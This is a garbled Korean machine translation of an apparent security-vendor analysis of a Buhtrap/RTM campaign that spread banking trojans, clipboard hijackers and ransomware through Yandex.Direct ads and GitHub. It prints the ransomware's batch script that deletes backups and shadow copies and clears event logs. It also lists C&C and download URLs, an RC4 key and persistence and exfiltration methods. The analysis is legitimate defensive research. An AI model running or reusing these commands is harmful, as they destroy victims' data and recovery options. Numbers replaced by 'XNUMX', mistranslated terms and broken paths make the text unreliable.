백도어와 Buhtrap 암호화기는 Yandex.Direct를 사용하여 배포되었습니다.

사이버 공격에서 회계사를 표적으로 삼으려면 회계사가 온라인에서 검색하는 업무 문서를 사용할 수 있습니다. 이것은 대략 사이버 그룹이 지난 몇 달 동안 알려진 백도어를 배포하면서 수행해 온 작업입니다. 부트랩 и RTM, 암호화폐를 훔치는 암호화기 및 소프트웨어도 포함됩니다. 대부분의 목표는 러시아에 있습니다. 공격은 Yandex.Direct에 악성 광고를 게재하여 수행되었습니다. 잠재적인 피해자는 문서 템플릿으로 위장한 악성 파일을 다운로드하라는 요청을 받는 웹사이트로 연결되었습니다. Yandex는 경고 후 악성 광고를 제거했습니다.

Buhtrap의 소스코드는 과거 누구나 사용할 수 있도록 온라인에 유출된 바 있습니다. RTM 코드 가용성에 관한 정보가 없습니다.

이 게시물에서는 공격자가 Yandex.Direct를 사용하여 악성 코드를 배포하고 GitHub에 호스팅하는 방법에 대해 설명합니다. 이번 포스팅은 악성코드에 대한 기술적 분석으로 마무리하겠습니다.

Buhtrap과 RTM이 다시 사업을 시작했습니다.

확산 메커니즘과 피해자

피해자에게 전달된 다양한 페이로드는 공통 전파 메커니즘을 공유합니다. 공격자가 생성한 모든 악성 파일은 두 개의 서로 다른 GitHub 저장소에 배치되었습니다.

일반적으로 저장소에는 다운로드 가능한 악성 파일이 하나 포함되어 있으며 자주 변경되었습니다. GitHub를 사용하면 리포지토리 변경 내역을 볼 수 있으므로 특정 기간 동안 어떤 악성 코드가 배포되었는지 확인할 수 있습니다. 피해자가 악성 파일을 다운로드하도록 유도하기 위해 위 그림에 표시된 Blanki-shabloni24[.]ru 웹사이트를 사용했습니다.

사이트의 디자인과 악성 파일의 모든 이름은 양식, 템플릿, 계약서, 샘플 등 단일 개념을 따릅니다. 과거 Buhtrap 및 RTM 소프트웨어가 이미 회계사 공격에 사용된 점을 고려하면 새 캠페인의 전략은 동일합니다. 유일한 질문은 피해자가 공격자의 웹사이트에 어떻게 접속했는지입니다.

감염

이 사이트에 접속한 잠재적 피해자 중 적어도 몇 명은 악성 광고에 매료되었습니다. 다음은 예시 URL입니다.

https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456

링크를 보시면 아시겠지만, 해당 배너는 합법적인 회계 포럼인 bb.f2[.]kz에 게시되었습니다. 배너는 서로 다른 사이트에 나타났고, 모두 동일한 캠페인 ID(blanki_rsya)를 갖고 있으며, 대부분 회계 또는 법률 지원 서비스와 관련되어 있다는 점을 기억하는 것이 중요합니다. URL은 잠재적 피해자가 "송장 양식 다운로드" 요청을 사용했음을 보여 주며, 이는 표적 공격에 대한 우리의 가설을 뒷받침합니다. 아래는 배너가 등장한 사이트와 해당 검색어입니다.

• 청구서 양식 다운로드 – bb.f2[.]kz
• 샘플 계약 - Ipopen[.]ru
• 애플리케이션 불만 사항 샘플 - 77metrov[.]ru
• 계약서 - 공백-dogovor-kupli-prodazhi[.]ru
• 샘플 법원 청원 - zen.yandex[.]ru
• 샘플 불만 사항 - yuday[.]ru
• 샘플 계약서 – Regforum[.]ru
• 계약서 – assistus[.]ru
• 샘플 아파트 계약 – ​​napravah[.]com
• 법적 계약 샘플 - avito[.]ru

Blanki-shabloni24[.]ru 사이트는 간단한 시각적 평가를 통과하도록 구성되었을 수 있습니다. 일반적으로 GitHub 링크가 포함된 전문적인 사이트를 가리키는 광고는 분명히 나쁜 것으로 보이지 않습니다. 또한 공격자는 캠페인 기간인 것으로 추정되는 제한된 기간 동안만 악성 파일을 저장소에 업로드했습니다. 대부분의 경우 GitHub 저장소에는 빈 zip 아카이브 또는 빈 EXE 파일이 포함되어 있습니다. 따라서 공격자는 특정 검색어에 응답하여 회계사가 방문할 가능성이 가장 높은 사이트에 Yandex.Direct를 통해 광고를 배포할 수 있습니다.

다음으로 이런 식으로 배포되는 다양한 페이로드를 살펴보겠습니다.

페이로드 분석

분포의 연대기

해당 악성 캠페인은 2018년 XNUMX월 말부터 시작되어 글을 쓰는 시점에도 활발하게 활동하고 있습니다. 전체 저장소가 GitHub에서 공개적으로 사용 가능했기 때문에 우리는 XNUMX가지 서로 다른 악성 코드 계열의 배포에 대한 정확한 타임라인을 편집했습니다(아래 그림 참조). Git 기록과 비교하기 위해 ESET 원격 측정으로 측정하여 배너 링크가 발견된 시기를 표시하는 줄을 추가했습니다. 보시다시피 이는 GitHub의 페이로드 가용성과 밀접한 관련이 있습니다. XNUMX월 말 불일치는 저장소가 전체를 얻기 전에 GitHub에서 제거되었기 때문에 변경 기록의 일부가 없다는 사실로 설명될 수 있습니다.

그림 1. 악성코드 유포 연대순

코드 서명 인증서

캠페인에서는 여러 인증서를 사용했습니다. 일부는 둘 이상의 악성 코드군에 의해 서명되었으며 이는 서로 다른 샘플이 동일한 캠페인에 속했음을 나타냅니다. 개인 키가 있음에도 불구하고 운영자는 바이너리에 체계적으로 서명하지 않았으며 모든 샘플에 키를 사용하지 않았습니다. 2019년 XNUMX월 말, 공격자들은 개인 키가 없는 Google 소유 인증서를 사용하여 잘못된 서명을 만들기 시작했습니다.

캠페인과 관련된 모든 인증서와 그들이 서명한 맬웨어 계열이 아래 표에 나열되어 있습니다.

또한 우리는 이러한 코드 서명 인증서를 사용하여 다른 맬웨어 계열과의 연결을 설정했습니다. 대부분의 인증서에 대해 GitHub 리포지토리를 통해 배포되지 않은 샘플을 찾지 못했습니다. 그러나 TOV “MARIYA” 인증서는 봇넷에 속하는 악성코드에 서명하는 데 사용되었습니다. 와우초스, 애드웨어 및 광부. 이 악성코드가 이 캠페인과 관련이 있을 가능성은 거의 없습니다. 아마도 인증서는 다크넷에서 구입했을 가능성이 높습니다.

Win32/파일코더.Buhtrap

우리의 관심을 끌었던 첫 번째 구성 요소는 새로 발견된 Win32/Filecoder.Buhtrap이었습니다. 이는 때때로 패키지로 제공되는 Delphi 바이너리 파일입니다. 주로 2019년 XNUMX~XNUMX월에 배포되었습니다. 이는 랜섬웨어 프로그램에 맞게 작동합니다. 즉, 로컬 드라이브와 네트워크 폴더를 검색하고 탐지된 파일을 암호화합니다. 암호화 키를 보내기 위해 서버에 접속하지 않기 때문에 인터넷 연결이 손상될 필요가 없습니다. 대신 랜섬 메시지 끝에 "토큰"을 추가하고 이메일이나 Bitmessage를 사용하여 운영자에게 연락할 것을 제안합니다.

가능한 한 많은 민감한 리소스를 암호화하기 위해 Filecoder.Buhtrap은 암호화를 방해할 수 있는 귀중한 정보가 포함된 열린 파일 핸들러가 있을 수 있는 주요 소프트웨어를 종료하도록 설계된 스레드를 실행합니다. 대상 프로세스는 주로 데이터베이스 관리 시스템(DBMS)입니다. 또한 Filecoder.Buhtrap은 로그 파일과 백업을 삭제하여 데이터 복구를 어렵게 만듭니다. 이렇게 하려면 아래 배치 스크립트를 실행하세요.

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled

Filecoder.Buhtrap은 웹사이트 방문자에 대한 정보를 수집하도록 설계된 합법적인 온라인 IP Logger 서비스를 사용합니다. 이는 명령줄의 책임인 랜섬웨어 피해자를 추적하기 위한 것입니다.

mshta.exe "javascript:document.write('');"

세 개의 제외 목록과 일치하지 않으면 암호화할 파일이 선택됩니다. 첫째, 다음 확장자를 가진 파일은 암호화되지 않습니다: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys 및 .박쥐. 둘째, 전체 경로에 아래 목록의 디렉터리 문자열이 포함된 모든 파일이 제외됩니다.

.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel

셋째, 랜섬 메시지의 파일명과 같은 특정 파일명도 암호화에서 제외됩니다. 목록은 아래에 나와 있습니다. 분명히 이러한 예외는 모두 기계 작동을 유지하기 위한 것이지만 주행 적합성을 최소화하기 위한 것입니다.

boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe

파일 암호화 체계

악성코드가 실행되면 512비트 RSA 키 쌍을 생성합니다. 그런 다음 개인 지수(d)와 모듈러스(n)는 하드 코딩된 2048비트 공개 키(공개 지수 및 모듈러스)로 암호화되고, zlib로 압축되고, base64로 인코딩됩니다. 이를 담당하는 코드는 그림 2에 나와 있습니다.

그림 2. 512비트 RSA 키 쌍 생성 프로세스의 Hex-Rays 디컴파일 결과.

다음은 랜섬 메시지에 첨부된 토큰인 생성된 개인 키가 포함된 일반 텍스트의 예입니다.

DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239

공격자의 공개키는 아래와 같습니다.

e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD

파일은 128비트 키와 AES-256-CBC를 사용하여 암호화됩니다. 암호화된 각 파일에 대해 새 키와 새 초기화 벡터가 생성됩니다. 암호화된 파일 끝에 키 정보가 추가됩니다. 암호화된 파일의 형식을 고려해 보겠습니다.
암호화된 파일에는 다음 헤더가 있습니다.

VEGA 매직 값이 추가된 소스 파일 데이터는 처음 0x5000바이트까지 암호화됩니다. 모든 암호 해독 정보는 다음 구조의 파일에 첨부됩니다.

- 파일 크기 표시에는 파일 크기가 0x5000바이트보다 큰지 여부를 나타내는 표시가 포함되어 있습니다.
— AES 키 blob = ZlibCompress(RSAEncrypt(AES 키 + IV, 생성된 RSA 키 쌍의 공개 키))
- RSA 키 blob = ZlibCompress(RSAEncrypt(생성된 RSA 개인 키, 하드 코딩된 RSA 공개 키))

Win32/클립뱅커

Win32/ClipBanker는 2018년 4월 말부터 XNUMX월 초까지 간헐적으로 배포되었던 구성 요소입니다. 그 역할은 클립보드의 내용을 모니터링하고 암호화폐 지갑의 주소를 찾는 것입니다. 대상 지갑 주소를 결정한 후 ClipBanker는 이를 운영자에게 속한다고 생각되는 주소로 대체합니다. 우리가 조사한 샘플은 박스형이거나 난독화되지 않았습니다. 동작을 마스킹하는 데 사용되는 유일한 메커니즘은 문자열 암호화입니다. 운영자 지갑 주소는 RCXNUMX를 사용하여 암호화됩니다. 대상 암호화폐는 비트코인, 비트코인 ​​캐시, 도지코인, 이더리움, 리플입니다.

악성코드가 공격자의 비트코인 ​​지갑으로 확산되는 동안 소량이 VTS로 전송되어 캠페인의 성공 여부에 대한 의구심을 불러일으켰습니다. 또한 이러한 거래가 ClipBanker와 관련이 있다는 증거도 전혀 없습니다.

Win32/RTM

Win32/RTM 구성 요소는 2019년 2017월 초에 며칠 동안 배포되었습니다. RTM은 원격 뱅킹 시스템을 목표로 Delphi로 작성된 트로이 목마 뱅커입니다. XNUMX년에 ESET 연구진은 다음과 같이 발표했습니다. подробный analyз 이 프로그램의 설명은 여전히 ​​관련이 있습니다. 2019년 XNUMX월 팔로알토네트웍스도 출시 RTM에 대한 블로그 게시물.

Buhtrap 로더

한동안 GitHub에서는 이전 Buhtrap 도구와 유사하지 않은 다운로더를 사용할 수 있었습니다. 그는 다음으로 향한다 https://94.100.18[.]67/RSS.php?<some_id> 다음 단계를 가져와 메모리에 직접 로드합니다. 두 번째 단계 코드의 두 가지 동작을 구분할 수 있습니다. 첫 번째 URL에서 RSS.php는 Buhtrap 백도어를 직접 전달했습니다. 이 백도어는 소스 코드가 유출된 후 사용할 수 있는 백도어와 매우 유사합니다.

흥미롭게도 우리는 Buhtrap 백도어를 사용하는 여러 캠페인을 볼 수 있으며, 이 캠페인은 서로 다른 운영자에 의해 운영되는 것으로 알려졌습니다. 이 경우 가장 큰 차이점은 백도어가 메모리에 직접 로드되고 우리가 언급한 DLL 배포 프로세스와 함께 일반적인 방식을 사용하지 않는다는 것입니다. 전에. 또한, 운영자들은 C&C 서버로 향하는 네트워크 트래픽을 암호화하는데 사용되는 RC4 키를 변경했습니다. 우리가 본 대부분의 캠페인에서 운영자는 이 키를 변경하는 데 신경을 쓰지 않았습니다.

두 번째로 더 복잡한 동작은 RSS.php URL이 다른 로더로 전달된다는 것입니다. 동적 가져오기 테이블을 다시 작성하는 등 일부 난독화를 구현했습니다. 부트로더의 목적은 C&C 서버에 접속하는 것입니다. msiofficeupd[.]com/api/F27F84EDA4D13B15/2, 로그를 보내고 응답을 기다립니다. 응답을 blob으로 처리하고 메모리에 로드한 후 실행합니다. 이 로더를 실행하는 것을 본 페이로드는 동일한 Buhtrap 백도어였지만 다른 구성 요소가 있을 수 있습니다.

안드로이드/스파이.뱅커

흥미롭게도 Android용 구성 요소가 GitHub 저장소에서도 발견되었습니다. 그는 1년 2018월 XNUMX일 단 하루 동안만 본점에 있었습니다. GitHub에 게시된 것 외에 ESET 원격 분석에서는 이 악성 코드가 배포되었다는 증거를 찾지 못했습니다.

구성 요소는 APK(Android 애플리케이션 패키지)로 호스팅되었습니다. 매우 난독화되어 있습니다. 악성 행위는 APK에 있는 암호화된 JAR에 숨겨져 있습니다. 다음 키를 사용하여 RC4로 암호화됩니다.

key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]

문자열을 암호화하는 데 동일한 키와 알고리즘이 사용됩니다. JAR은 다음 위치에 있습니다. APK_ROOT + image/files. 파일의 처음 4바이트에는 길이 필드 바로 뒤에서 시작되는 암호화된 JAR의 길이가 포함됩니다.

파일의 암호를 해독한 결과 이전에 Anubis라는 것을 발견했습니다. 문서화 안드로이드용 뱅커. 악성코드에는 다음과 같은 특징이 있습니다.

• 마이크 녹음
• 스크린샷 찍기
• GPS 좌표 가져오기
• 키로거
• 기기 데이터 암호화 및 몸값 요구
• 스팸

흥미롭게도 이 은행가는 또 다른 C&C 서버를 확보하기 위해 트위터를 백업 통신 채널로 사용했습니다. 우리가 분석한 샘플은 @JonesTrader 계정을 사용했지만 분석 당시에는 이미 차단되어 있었습니다.

Banker에는 Android 기기의 대상 애플리케이션 목록이 포함되어 있습니다. Sophos 연구에서 얻은 목록보다 깁니다. 목록에는 다양한 뱅킹 애플리케이션, Amazon 및 eBay와 같은 온라인 쇼핑 프로그램, 암호화폐 서비스가 포함됩니다.

MSIL/ClipBanker.IH

이 캠페인의 일부로 배포된 마지막 구성 요소는 2019년 1.0.0월에 등장한 .NET Windows 실행 파일이었습니다. 연구된 대부분의 버전은 ConfuserEx vXNUMX과 함께 패키지되었습니다. ClipBanker와 마찬가지로 이 구성 요소는 클립보드를 사용합니다. 그의 목표는 다양한 암호화폐와 Steam에서의 상품을 제공하는 것입니다. 또한 그는 IP Logger 서비스를 사용하여 비트코인 ​​개인 WIF 키를 훔칩니다.

보호 메커니즘
ConfuserEx는 디버깅, 덤핑 및 변조를 방지하는 데 제공되는 이점 외에도 바이러스 백신 제품 및 가상 머신을 탐지하는 기능을 포함합니다.

가상 머신에서 실행되는지 확인하기 위해 악성코드는 내장된 Windows WMI 명령줄(WMIC)을 사용하여 다음과 같은 BIOS 정보를 요청합니다.

wmic bios

그런 다음 프로그램은 명령 출력을 구문 분석하고 VBOX, VirtualBox, XEN, qemu, bochs, VM이라는 키워드를 찾습니다.

바이러스 백신 제품을 탐지하기 위해 맬웨어는 다음을 사용하여 Windows 보안 센터에 WMI(Windows Management Instrumentation) 요청을 보냅니다. ManagementObjectSearcher API는 아래와 같습니다. base64에서 디코딩한 후 호출은 다음과 같습니다.

ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')

그림 3. 바이러스 백신 제품 식별 프로세스.

또한 악성코드는 다음과 같은 사항을 확인합니다. CryptoClipWatcher, 클립보드 공격으로부터 보호하는 도구이며 실행 중인 경우 해당 프로세스의 모든 스레드를 일시 중단하여 보호를 비활성화합니다.

고집

우리가 연구한 맬웨어 버전은 자신을 복사합니다. %APPDATA%googleupdater.exe Google 디렉토리에 '숨김' 속성을 설정합니다. 그런 다음 그녀는 값을 변경합니다. SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell Windows 레지스트리에 경로를 추가합니다. updater.exe. 이렇게 하면 사용자가 로그인할 때마다 악성코드가 실행됩니다.

악의적인 행동

ClipBanker와 마찬가지로 이 악성코드는 클립보드의 내용을 모니터링하여 암호화폐 지갑 주소를 찾고, 발견되면 이를 운영자의 주소 중 하나로 대체합니다. 다음은 코드에서 발견된 내용을 기반으로 한 대상 주소 목록입니다.

BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL

각 주소 유형에 해당하는 정규식이 있습니다. STEAM_URL 값은 버퍼에서 정의하는 데 사용되는 정규 표현식에서 볼 수 있듯이 Steam 시스템을 공격하는 데 사용됩니다.

b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b

유출 채널

이 악성코드는 버퍼의 주소를 바꾸는 것 외에도 비트코인, 비트코인 ​​코어, 일렉트럼 비트코인 ​​지갑의 개인 WIF 키를 표적으로 삼습니다. 이 프로그램은 plogger.org를 추출 채널로 사용하여 WIF 개인 키를 얻습니다. 이를 위해 운영자는 아래와 같이 User-Agent HTTP 헤더에 개인 키 데이터를 추가합니다.

그림 4. 출력 데이터가 있는 IP 로거 콘솔.

운영자는 지갑을 유출하기 위해 iplogger.org를 사용하지 않았습니다. 아마도 필드의 255자 제한으로 인해 다른 방법을 사용했을 것입니다. User-AgentIP Logger 웹 인터페이스에 표시됩니다. 우리가 연구한 샘플에서 다른 출력 서버는 환경 변수에 저장되었습니다. DiscordWebHook. 놀랍게도 이 환경 변수는 코드 어디에도 할당되지 않습니다. 이는 해당 악성코드가 아직 개발 중이며 해당 변수가 운영자의 테스트 머신에 할당되어 있음을 의미합니다.

프로그램이 개발 중이라는 또 다른 신호가 있습니다. 바이너리 파일에는 두 개의 iplogger.org URL이 포함되어 있으며 데이터가 유출될 때 둘 다 쿼리됩니다. 이러한 URL 중 하나에 대한 요청에서 Referer 필드의 값 앞에는 "DEV /"가 붙습니다. 또한 ConfuserEx를 사용하여 패키징되지 않은 버전도 발견했습니다. 이 URL의 수신자는 DevFeedbackUrl입니다. 환경 변수명으로 볼 때, 운영자는 합법적인 서비스인 Discord와 해당 웹 차단 시스템을 이용해 암호화폐 지갑을 탈취하려는 계획을 갖고 있는 것으로 판단됩니다.

결론

이 캠페인은 사이버 공격에서 합법적인 광고 서비스를 사용한 예입니다. 이 계획은 러시아 조직을 표적으로 삼고 있지만 러시아 이외의 서비스를 사용하여 그러한 공격을 하는 것은 놀라운 일이 아닙니다. 손상을 방지하려면 사용자는 다운로드하는 소프트웨어 소스의 평판을 확신해야 합니다.

침해 지표 및 MITRE ATT&CK 속성의 전체 목록은 다음에서 확인할 수 있습니다. 링크.

출처 : habr.com